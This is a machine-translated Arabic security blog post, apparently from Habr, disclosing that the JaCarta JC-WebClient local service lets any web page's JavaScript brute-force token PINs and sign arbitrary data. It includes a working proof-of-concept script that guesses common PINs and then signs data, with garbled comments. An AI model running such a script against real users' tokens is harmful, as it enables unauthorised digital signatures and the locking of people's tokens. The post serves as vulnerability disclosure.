اختبار JaCarta WebClient أو تخزين الرموز في مكان آمن

"عندما تم تفجير الغطاء الأسود للحظة واحدة ، استدار مارجريتا ورأيت أنه لم يكن هناك أبراج متعددة الألوان فقط مع وجود طائرة تتكشف فوقها ، ولكن لم تكن هناك مدينة بذلت الأرض ولم تترك سوى الضباب".

ماجستير بولجاكوف
"ماجستير ومارغريتا"

مرحبا يا هبر! ربما تقريبًا كل مؤسسة روسية لديها هذه المنتجات بألوان مبهجة متعددة الألوان. نحن نتحدث عن منتجات وبرامج JaCarta لهم. سقطت هذه السعادة لي أيضًا ، وقررت توسيع الغطاء الأسود قليلاً يخفي جوهره أو واجهة برمجة التطبيقات. تتطلب بعض البنوك ، وخاصة إصدار الرموز المميزة لـ JaCarta GOST-2 لعملائها ، تثبيت تطبيق JC-WebClient من علاء الدين R.D للعمل.

على الرغم من عدم وجود توزيع جديد على الموقع الرسمي للمطور (في قسم العرض التوضيحي ، يمكنك تنزيل إصدار أقدم ، ولكنه يستخدم واجهة برمجة التطبيقات القديمة) ، يمكن العثور على التوزيع باستخدام Google على السطر "JC-WebClient-4.0.0.1186" على مواقع RB.

بعد تثبيت التطبيق على كمبيوتر المستخدم ، يتم فتح المنفذ 24738 الذي يعمل عليه هذا العميل.

https://localhost:24738/JCWebClient.js

يصف موقع المطور على شبكة الإنترنت بصراحة وبالتفصيل واجهة برمجة التطبيقات لهذا التطبيق (بالإضافة إلى وظائف العمل مع نظام الملفات لخط الرمز المميز بأكمله لهذه الشركة المصنعة من خلال jcFS.dll ، والذي يعد جزءًا من حزمة تثبيت "عميل واحد JaCarta") والنتيجة الأساسية هي أنه باستخدام عدد من الوظائف يمكنك إما قم بتوقيع التوقيع الرقمي للرمز المميز مع أي شيء ، أو التقاط رمز PIN ، أو حظر الرمز المميز بمحاولات فاشلة لإدخاله. وكل هذا عن بعد عبر الإنترنت.

ليس سراً أن المستخدمين غالبًا ما يتركون رمز PIN الافتراضي للرمز المميز ، أو الرمز الذي استلموه (عادة ما يخشون أنه عند تغيير رمز PIN سيتوقف كل شيء عن العمل).

في معظم الأحيان ، يتم استخدام رموز PIN من النوع 123456 ، ويتم إدخال الرمز المميز في منفذ الكمبيوتر أو لوحة وصل USB خلال يوم العمل ، أو حتى على مدار الساعة.

بفضل JC-WebClient ، إذا قمت بتمرير صفحة ويب أو بريد إلكتروني باستخدام JavaScript بسيط لمثل هذا المستخدم ، يمكنك ، على الرغم من عدم الحصول على مفاتيح الرمز المميز (في بعض الحالات ، يكون ذلك ممكنًا فقط عن طريق الوصول مباشرة إلى نظام الملفات الرمز المميز ، وقد تم تقديم مثال بالفعل ) ، ولكن حاول بالفعل التقاط رمز PIN وتوقيع أي بيانات وإرسالها إلى مكان ما.

في حالة 10 محاولات فاشلة للتكرار ، يتم حظر الرمز المميز ، ومدى حدوثه ، إذا لم يتم تعيين رمز المسؤول لإلغاء القفل ، فإن التهيئة فقط ستساعد. وهذا لا يتم دفعه على الضرائب في الوقت المحدد (ونتيجة للفوائد وحتى حجب الحساب الضريبي لتنظيم الضريبة) ، والمصادرة من الموردين ، بشكل عام ، جيدة ليست كافية.



يمكن حل مشكلة تعداد الرمز السري إما عن طريق السماح بإدخاله فقط من خلال نافذة واجهة JC-WebClient ، أو كتدبير نصف ، على سبيل المثال ، في حالة حدوث ثلاث محاولات غير ناجحة لإدخاله ، حظر المزيد من التخويل عن طريق عرض رسالة للمستخدم والانتظار حتى سوف تؤكد أفعالك.

لقد كتبت سكريبت اختبار صغير يوضح هذه الثغرة الأمنية. البرنامج النصي يعمل على جميع المتصفحات الحديثة والحديثة نسبيا ، حتى IE :)

بطبيعة الحال ، لا يرسل أي شيء في أي مكان ، لكنه يعرض ببساطة نتائج سلسلة من الوظائف.

ينفذ البرنامج النصي تعدادًا كاملاً لـ 10 محاولات لإدخال الرمز السري "لقتل" الرمز المميز ، بحيث يمكنك تشغيل البرنامج النصي فقط برمز اختبار!

يجب أيضًا أن نتذكر أن استخدام هذا البرنامج النصي بخلاف الرمز المميز للاختبار هو انتهاك للقانون.

نتيجة الاختبار:


يقوم البرنامج النصي بإنشاء زوج مفتاح وشهادة باستخدام JC-WebClient للاختبار.
يمكنك استخدام EToken PRO Java 72 K و JaCarta GOST و JaCarta GOST-2. يجب أن تتم تهيئة الرمز المميز مسبقًا بواسطة المستخدم PIN 111111.

قبل البدء في الاختبار ، يجب عليك تثبيت JC-WebClient الإصدار 4 أو الأحدث.

 // JCWebClient2 JCWebClient2.initialize(); document.write("JC-WebClient   "+" "); //  JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(" JCWebClient2 " + vers +" "); //         var slots = JCWebClient2.getAllSlots(); document.write(" : "+slots.length+" "); //   for (i = 0; i < slots.length; i++) { var slot = slots[i]; document.write(": "+slot.device.name+" "+slot.device.model+" "); } var tokenID = slot.id, //   userPin = '111111'; // PIN-  //       // (  JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write('1) Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //  PIN- JCWebClient2.bindToken({ args: { tokenID: tokenID, pin: userPin } }); //    // (  JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write('2) Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //          var keyPairID = JCWebClient2.createKeyPair({ args: { paramSet: "XA", description: "my description", algorithm: JCWebClient2.Vars.KeyAlgorithm.GOST_2012_256 } }); //     (Distinguished Name (DN)), //    (Common Name, (CN)) var dn = { 'CN': '123', 'C': 'RU' }; //  ,      var exts = { 'keyUsage': 'Digital Signature' }; //   var contID = JCWebClient2.generateUserSelfSignedCertificate({ args: { keyPairID: keyPairID, dn: dn, exts: exts, days: 365 } }); //    var list=[]; //   list = JCWebClient2.getContainerList({ args: { tokenID: tokenID } }); // id      var data = list[0]; var contID = data.id; document.write("ID : "+data.id+" "); document.write(" : "+data.description+" "); document.write(" : "+data.algorithm+" "); //   PIN- JCWebClient2.unbindToken(); 

وفي الواقع النصي التدقيق الأمني ​​نفسه:

 // JCWebClient2 JCWebClient2.initialize(); document.write("JC-WebClient   "+" "); //  JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(" JCWebClient2 " + vers +" "); //         var slots = JCWebClient2.getAllSlots(); document.write(" : "+slots.length+" "); //   for (i = 0; i < slots.length; i++) { var slot = slots[i]; document.write(": "+slot.device.name+" "+slot.device.model+" "); } //   var tokenID = slot.id; //       // (  JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write('Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //    var list=[]; //   list = JCWebClient2.getContainerList({ args: { tokenID: tokenID } }); // id     var data = list[0]; var contID = data.id; document.write("ID : "+data.id+" "); document.write(" : "+data.description+" "); document.write(" : "+data.algorithm+" "); //    (Hello World  Base64) var dataToSign = 'SGVsbG8sIFdvcmxkIQ=='; document.write("  : "+dataToSign+" "); //   var pin=["1234567890", "123456", "1234567", "12345678", "123456789", "0987654321", "111111", "qwerty", "012345", "0123456", "01234567"]; //  function bind(pass) { JCWebClient2.bindToken({ args: { tokenID: tokenID, pin: pass } }); } var i=0; //     //!  10    !!!!!!!!!! while (i < 10) { i++; try{ bind(pin[i]); tokenState = JCWebClient2.getLoggedInState(); //  ,      if(tokenState.state=1) { document.write("   : "+pin[i]+" "); break; } } //    catch(e){document.write(e+" ");} } //    // (  JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write('Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //   var CertificateBody=JCWebClient2.getCertificateBody({ args: { id: contID } }); document.write("CertificateBody: "+CertificateBody+" "); //  ,        Base64 var signedData = JCWebClient2.signBase64EncodedData({ args: { contID: contID, data: dataToSign, attachedSignature: true } }); document.write(" . "); document.write(" : "+signedData+" "); //  var signature = signedData; var res = JCWebClient2.verifyBase64EncodedData({ args: { signature: signature } }); document.write("  : "+res+" "); //   PIN- JCWebClient2.unbindToken(); 

→ مصدر معلومات JC-WebClient API